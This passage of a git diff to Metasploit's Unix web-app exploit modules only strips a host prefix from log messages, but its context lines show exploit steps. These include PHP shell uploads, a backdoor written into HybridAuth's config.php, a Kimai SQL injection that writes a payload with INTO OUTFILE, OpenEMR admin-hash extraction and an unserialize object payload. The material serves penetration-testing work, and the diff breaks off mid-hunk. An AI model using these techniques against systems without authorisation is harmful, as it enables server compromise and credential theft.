b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} found") + print_status("Version #{version} found") if Gem::Version.new(version) <= Gem::Version.new('3.1.2') return Exploit::CheckCode::Appears @@ -103,34 +103,34 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating...") + print_status("Authenticating...") res = send_request_auth if res && res.code == 302 - print_status("#{peer} - The authentication process is done successfully!") + print_status("The authentication process is done successfully!") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Extracting Cookies Information...") + print_status("Extracting Cookies Information...") cookie = res.get_cookies if cookie.blank? fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht' res = send_request_upload(payload_name, cookie) if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</ upload_path = $1 - print_good("#{peer} - File uploaded to #{upload_path}") + print_good("File uploaded to #{upload_path}") register_file_for_cleanup(payload_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_raw({ 'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 13ce643e2e..8840dc855c 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote login if not @session_id or @session_id.empty? - vprint_error "#{peer} - Authentication failed" + vprint_error "Authentication failed" return Exploit::CheckCode::Unknown end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 303 @session_id = res.get_cookies - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" end end @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' @session_id = "" - print_status "#{peer} - Trying login" + print_status "Trying login" login if not @session_id or @session_id.empty? - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status "#{peer} - Authentication successfully, trying to exploit" + print_status "Authentication successfully, trying to exploit" data = "rs=passthru&" data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&" @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 or not res.body =~ /\+/ - print_error "#{peer} - Exploitation failed" + print_error "Exploitation failed" return end diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 311d36732b..f76388a42d 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || '' if not version.empty? and version =~ /1\.1\.7/ - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") return Exploit::CheckCode::Appears end @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index 92437ae125..ecfd1ac294 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Testing injection...") + print_status("Testing injection...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...") end - print_status("#{peer} - Exploiting the unserialize()...") + print_status("Exploiting the unserialize()...") send_request_exploit(payload.encoded) end diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 2ca9e0026e..6b495eed60 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -61,19 +61,19 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') if !res - vprint_error "#{peer} - Connection failed" + vprint_error "Connection failed" return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error "#{peer} - Could not find install.php" + vprint_error "Could not find install.php" elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</ - vprint_error "#{peer} - #{$1} is not writable" + vprint_error "#{$1} is not writable" elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</ version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/ return Exploit::CheckCode::Vulnerable else - vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable" + vprint_error "HybridAuth version #{version} is not vulnerable" end end Exploit::CheckCode::Safe @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end # write backdoor - print_status "#{peer} - Writing backdoor to config.php" + print_status "Writing backdoor to config.php" payload_param = rand(1000) res = send_request_cgi( 'method' => 'POST', @@ -99,40 +99,40 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with Failure::Unknown, "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Wrote backdoor successfully" + print_good "Wrote backdoor successfully" else fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" end # execute payload code = Rex::Text.encode_base64(payload.encoded) - print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" + print_status "Sending payload to config.php backdoor (#{code.length} bytes)" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'config.php'), 'data' => "#{payload_param}=#{code}" }, 5) if !res - print_warning "#{peer} - No response" + print_warning "No response" elsif res.code == 404 fail_with Failure::NotFound, "#{peer} - Could not find config.php" elsif res.code == 200 || res.code == 500 - print_good "#{peer} - Sent payload successfully" + print_good "Sent payload successfully" end # remove backdoor - print_status "#{peer} - Removing backdoor from config.php" + print_status "Removing backdoor from config.php" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install.php'), 'data' => 'OPENID_ADAPTER_STATUS=' ) if !res - print_error "#{peer} - Connection failed" + print_error "Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Removed backdoor successfully" + print_good "Removed backdoor successfully" else - print_warning "#{peer} - Could not remove payload from config.php" + print_warning "Could not remove payload from config.php" end end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index 8544567488..e2b2f8b485 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote end def cookie_prefix - print_status("#{peer} - Checking for cookie prefix") + print_status("Checking for cookie prefix") cookie_prefix = "" res = send_request_cgi( { @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.get_cookies =~ /(.+)session/ - print_status("#{peer} - Cookie prefix #{$1} found") + print_status("Cookie prefix #{$1} found") cookie_prefix = $1 end return cookie_prefix @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -139,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}") + print_error("Exploit failed: #{res.code}") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"}) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 4319647596..7836c4732d 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote @zip = zip_file.pack # First step: call restore to run _prepare() and get an initialized AKFactory - print_status("#{peer} - Sending PHP serialized object...") + print_status("Sending PHP serialized object...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory) modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1') - print_status("#{peer} - Sending initialized and modified AKFactory...") + print_status("Sending initialized and modified AKFactory...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(php_filename) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename) }, 2) diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index fa6e5d8723..a48ba48d99 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 - print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") + print_status("Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] - print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") + print_status("Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 - print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") + print_status("Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ - print_status("#{peer} - Successfully authenticated as Administrator") + print_status("Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alphanumeric(rand(10)+6) # Create file - print_status("#{peer} - Creating file [ #{filename}.php ]") + print_status("Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] - print_status("#{peer} - Following redirect to [ #{location} ]") + print_status("Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -208,14 +208,14 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 - print_status("#{peer} - Template path [ #{template_path} ] retrieved") + print_status("Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end @@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file - print_status("#{peer} - Insert payload into file [ #{filename}.php ]") + print_status("Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -248,14 +248,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ - print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") + print_status("Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index cad27d9654..5d2cb35756 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ - vprint_status("#{peer} - Joomla Media Manager Found but authentication required") + vprint_status("Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /<form action="(.*)" id="uploadForm"/ - vprint_status("#{peer} - Joomla Media Manager Found and authentication isn't required") + vprint_status("Joomla Media Manager Found and authentication isn't required") return Exploit::CheckCode::Detected end end @@ -174,18 +174,18 @@ class Metasploit3 < Msf::Exploit::Remote @username = datastore['USERNAME'] @password = datastore['PASSWORD'] - print_status("#{peer} - Checking Access to Media Component...") + print_status("Checking Access to Media Component...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ - print_status("#{peer} - Authentication required... Proceeding...") + print_status("Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") - print_status("#{peer} - Accessing the Login Form...") + print_status("Accessing the Login Form...") res = get_login_form if res.nil? or (res.code != 200 and res.code != 302) or res.body !~ /login/ fail_with(Failure::Unknown, "#{peer} - Unable to Access the Login Form") @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/ - print_status("#{peer} - Authentication isn't required.... Proceeding...") + print_status("Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component") end - print_status("#{peer} - Accessing the Upload Form...") + print_status("Accessing the Upload Form...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action="(.*)" id="uploadForm"/ @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to Access the Upload Form") end - print_status("#{peer} - Uploading shell...") + print_status("Uploading shell...") res = upload(upload_uri) @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end register_files_for_cleanup("#{@upload_name}.") - print_status("#{peer} - Executing shell...") + print_status("Executing shell...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index b088c8e86f..51c9a53ffa 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb @@ -63,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if target is Kimai version 0.9.2.x # def check - vprint_status("#{peer} - Checking version...") + vprint_status("Checking version...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") }) if not res - vprint_error("#{peer} - Request timed out") + vprint_error("Request timed out") return Exploit::CheckCode::Unknown elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/ version = "#{$1}" - print_good("#{peer} - Found version: #{version}") + print_good("Found version: #{version}") if version >= "0.9.2" and version <= "0.9.2.1306" return Exploit::CheckCode::Appears end @@ -81,33 +81,33 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get file system path - print_status("#{peer} - Retrieving file system path...") + print_status("Retrieving file system path...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/ path = "#{$1}" - print_good("#{peer} - Found file system path: #{path}") + print_good("Found file system path: #{path}") else path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path) - print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'") + print_warning("Could not retrieve file system path. Assuming '#{path}'") end # Get MySQL table name prefix from temporary/logfile.txt - print_status("#{peer} - Retrieving MySQL table name prefix...") + print_status("Retrieving MySQL table name prefix...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/) table_prefix = "#{prefixes.flatten.last}" - print_good("#{peer} - Found table name prefix: #{table_prefix}") + print_good("Found table name prefix: #{table_prefix}") else table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path) - print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") + print_warning("Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") end # Create a backup ID - print_status("#{peer} - Creating a backup to get a valid backup ID...") + print_status("Creating a backup to get a valid backup ID...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/) id = "#{backup_ids.flatten.last}" - print_good("#{peer} - Found backup ID: #{id}") + print_good("Found backup ID: #{id}") else fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID") end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # Write PHP payload to disk using MySQL injection 'into outfile' fname = "#{rand_text_alphanumeric(rand(10)+10)}.php" sqli = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- " - print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") + print_status("Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -139,14 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(fname) else - print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}") + print_error("Sending payload failed. Received HTTP code: #{res.code}") end # Remove the backup - print_status("#{peer} - Removing the backup...") + print_status("Removing the backup...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -156,15 +156,15 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if not res - print_warning("#{peer} - Request timed out") + print_warning("Request timed out") elsif res.code == 302 and res.body !~ /#{id}/ - vprint_good("#{peer} - Deleted backup with ID '#{id}'") + vprint_good("Deleted backup with ID '#{id}'") else - print_warning("#{peer} - Could not remove backup with ID '#{id}'") + print_warning("Could not remove backup with ID '#{id}'") end # Execute payload - print_status("#{peer} - Retrieving file '#{fname}'...") + print_status("Retrieving file '#{fname}'...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}") }, 5) diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 8030e347cc..b68a39ed2e 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -132,13 +132,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") orig_fname = upload(base) - print_status("#{peer} - Renaming #{orig_fname}...") + print_status("Renaming #{orig_fname}...") new_fname = rename(base, orig_fname) - print_status("#{peer} - Executing #{new_fname}...") + print_status("Executing #{new_fname}...") exec(base, new_fname) end end diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index fc9b180f61..8524edfb3a 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, @@ -84,13 +84,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) - print_good("#{peer} - Response parsed successfully") + print_good("Response parsed successfully") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index f5fdb49389..8660cf678d 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -83,20 +83,20 @@ class Metasploit3 < Msf::Exploit::Remote def check sig = rand_text_alpha(rand(10) + 5) #The string to check - vprint_status("#{peer} - Looking for signature '#{sig}'...") + vprint_status("Looking for signature '#{sig}'...") res = remote_exe("echo #{sig}") if res and res.body =~ /#{sig}/ - vprint_status("#{peer} - Signature '#{sig}' found.") + vprint_status("Signature '#{sig}' found.") return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Signature not found") + vprint_status("Signature not found") return Exploit::CheckCode::Safe end end def exploit - print_status("#{peer} - Sending malicious request...") + print_status("Sending malicious request...") remote_exe(payload.encoded) end diff --git a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb index f8b6b04ba6..e7d56fcd2f 100644 --- a/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb +++ b/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb @@ -77,18 +77,18 @@ class Metasploit3 < Msf::Exploit::Remote # Check for ofc_upload_image.php # def check - print_status("#{peer} - Sending check") + print_status("Sending check") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No ofc_upload_image.php found") + vprint_error("No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ - vprint_status("#{peer} - Found ofc_upload_image.php") + vprint_status("Found ofc_upload_image.php") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote # Upload @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php" - print_status("#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") + print_status("Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body =~ /Saving your image to: (.+)#{@fname}/ path = $1 register_files_for_cleanup(@fname) - print_status("#{peer} - Executing '#{path}#{@fname}'") + print_status("Executing '#{path}#{@fname}'") else fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end diff --git a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb index 5672d926bd..8e91a2ef42 100644 --- a/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb +++ b/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version < "4.1.2" return Exploit::CheckCode::Appears @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end def login(base, name, pass) - #print_status("#{peer} - Logging in as non-admin user [ #{datastore['USER']} ]") + #print_status("Logging in as non-admin user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{base}", "interface", "main", "main_screen.php"), @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM users WHERE username = 0x61646d696e LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '#{sqlq}'='#{sqlq}" post_data = "form_pubpid=#{sqli}" - print_status("#{peer} - Retrieving admin password hash through SQLi") + print_status("Retrieving admin password hash through SQLi") res = send_request_cgi({ 'method' => 'POST', 'data' => post_data, @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin password hash is [ #{adminhash} ]") + print_status("Admin password hash is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin password failed!") end @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading shell [ #{payload_name} ]") + print_status("Uploading shell [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "interface", "super", "manage_site_files.php"), @@ -164,7 +164,7 @@ class Metasploit3 < 